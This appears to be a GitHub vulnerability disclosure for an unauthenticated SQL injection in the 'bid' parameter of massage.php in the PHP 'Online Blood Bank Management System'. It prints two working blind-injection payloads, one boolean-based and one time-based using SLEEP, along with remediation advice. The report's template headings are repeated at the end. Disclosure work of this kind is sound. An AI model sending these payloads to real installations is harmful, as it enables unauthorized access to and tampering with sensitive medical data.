You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A SQL injection vulnerability was found in the 'massage.php' file of the 'Online Blood Bank Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "bid" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
Impact
Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
During the security review of the PHP "Online Blood Bank Management System", "noob" discovered a critical SQL injection vulnerability in the "massage.php" file. This vulnerability stems from insufficient user input validation of the "bid" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability type:
time-based blind
boolean-based blind
Vulnerability location:
'bid' parameter
Payload:
Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="bid"
111' AND 4176=(SELECT (CASE WHEN (4176=4176) THEN 4176 ELSE (SELECT 4425 UNION SELECT 8954) END))-- CaXL
------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="signup"
Send
------WebKitFormBoundary5pVPM2sdw5QlXfOx--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="bid"
111' AND (SELECT 6421 FROM (SELECT(SLEEP(5)))gfjJ)-- BscZ
------WebKitFormBoundary5pVPM2sdw5QlXfOx
Content-Disposition: form-data; name="signup"
Send
------WebKitFormBoundary5pVPM2sdw5QlXfOx--
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
Suggested repair
Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
The text was updated successfully, but these errors were encountered:
Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "massage.php" SQL injection
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability type:
Vulnerability location:
Payload:
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
Suggested repair
Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
The text was updated successfully, but these errors were encountered: